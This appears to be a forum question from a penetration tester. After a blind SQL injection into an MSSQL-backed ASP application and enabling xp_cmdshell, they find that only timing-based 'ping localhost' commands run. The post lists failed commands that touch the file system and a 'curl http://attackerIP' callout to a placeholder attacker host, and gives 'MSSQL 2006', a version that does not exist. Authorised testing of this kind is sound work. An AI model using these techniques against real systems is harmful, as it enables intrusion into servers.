5Nis
xp_cmdshell as dbo user only able to run ‘ping localhost’ to verify RCE?
I am doing a pentest on a client's ASP web application and I have identified a blind SQL injection. However, after enabling xp_cmdshell
, I am only able to run the ping localhost
command to verify the RCE, which has a 3-second delay. I also tried to run ping -n 10 localhost
and it has a ~10s delay as well.
I am fairly certain that there is a RCE here but I can't seem to run other commands such as:
mkdir C:\Windows\Temp\pwned
mkdir C:\inetpub\wwwroot\pwned
del C:\Windows\Temp\randomFile
move C:\Windows\Temp\randomFile C:\Windows\Temp\randomFile2
curl http://attackerIP:80
(blocked by firewall)
I also managed to extract the username using the SELECT CURRENT_USER;
command using the blind SQL vulnerability and it is dbo
. The database version is MSSQL 2006.
What are some possible reasons that I am only able to run the ping localhost
command and not others?